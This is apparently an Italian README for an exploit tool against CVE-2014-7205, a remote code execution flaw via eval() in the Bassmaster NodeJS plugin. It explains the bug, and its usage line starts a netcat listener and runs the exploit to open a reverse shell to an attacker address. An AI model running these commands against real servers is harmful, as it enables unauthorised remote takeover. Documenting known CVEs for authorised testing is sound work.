
Bassmaster Plugin NodeJS RCE
bassmaster-rce.py: Uno script Python per sfruttare CVE-2014-7205. nodeshell.py: Un modulo Python per generare una reverse shell per NodeJS
!!Utilizzare solo contro server su cui si ha il permesso di testare
CVE-2014-7205 è una vulnerabilità di Remote Code Execution nel plugin Bassmaster per NodeJS. Tutte le versioni <= 1.5.1 sono affette. La vulnerabilità esiste nel file lib/batch.js nella funzione internals.batch dove una chiamata a eval() utilizza input utente non correttamente escaped (in pratica la regex non verifica se le richieste contengono codice malevolo).
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444